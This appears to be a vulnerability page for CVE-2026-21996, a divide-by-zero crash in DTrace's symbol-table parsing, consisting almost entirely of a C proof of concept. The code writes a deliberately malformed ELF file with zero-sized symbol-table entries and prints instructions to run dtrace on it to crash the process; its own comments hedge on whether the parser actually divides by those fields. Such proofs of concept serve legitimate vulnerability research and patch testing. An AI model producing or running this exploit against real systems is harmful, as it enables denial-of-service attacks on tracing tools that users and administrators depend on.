CVE-2026-21996: DTrace整数除零致进程崩溃漏洞

/* * PoC for CVE-2026-21996 * This code generates a malformed ELF binary designed to trigger * the integer divide-by-zero in Pbuild_file_symtab(). */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> // ELF Header structure (simplified for 64-bit) typedef struct { unsigned char e_ident[16]; uint16_t e_type; uint16_t e_machine; uint32_t e_version; uint64_t e_entry; uint64_t e_phoff; uint64_t e_shoff; uint32_t e_flags; uint16_t e_ehsize; uint16_t e_phentsize; uint16_t e_phnum; uint16_t e_shentsize; uint16_t e_shnum; uint16_t e_shstrndx; } Elf64_Ehdr; // Section Header structure typedef struct { uint32_t sh_name; uint32_t sh_type; uint64_t sh_flags; uint64_t sh_addr; uint64_t sh_offset; uint64_t sh_size; uint32_t sh_link; uint32_t sh_info; uint64_t sh_addralign; uint64_t sh_entsize; } Elf64_Shdr; int main(int argc, char *argv[]) { FILE *fp = fopen("malicious_elf", "wb"); if (!fp) { perror("Failed to create file"); return 1; } // 1. Setup ELF Header Elf64_Ehdr ehdr; memset(&ehdr, 0, sizeof(ehdr)); memcpy(ehdr.e_ident, "\x7fELF", 4); ehdr.e_ident[4] = 2; // ELFCLASS64 ehdr.e_ident[5] = 1; // ELFDATA2LSB ehdr.e_ident[6] = 1; // EV_CURRENT ehdr.e_type = 2; // ET_EXEC ehdr.e_machine = 62; // EM_X86_64 ehdr.e_version = 1; ehdr.e_shoff = sizeof(ehdr); // Section header right after ELF header ehdr.e_ehsize = sizeof(ehdr); ehdr.e_shentsize = sizeof(Elf64_Shdr); ehdr.e_shnum = 1; // One section header fwrite(&ehdr, sizeof(ehdr), 1, fp); // 2. Setup Malicious Section Header (Symtab) Elf64_Shdr shdr; memset(&shdr, 0, sizeof(shdr)); shdr.sh_type = 2; // SHT_SYMTAB // Logic: If parser divides by sh_entsize or sh_size without checking, // setting them to 0 triggers the crash. shdr.sh_entsize = 0; shdr.sh_size = 0; fwrite(&shdr, sizeof(shdr), 1, fp); fclose(fp); printf("[+] Malicious ELF 'malicious_elf' created.\n"); printf("[+] Trigger: Run dtrace against this file to crash the process.\n"); return 0; }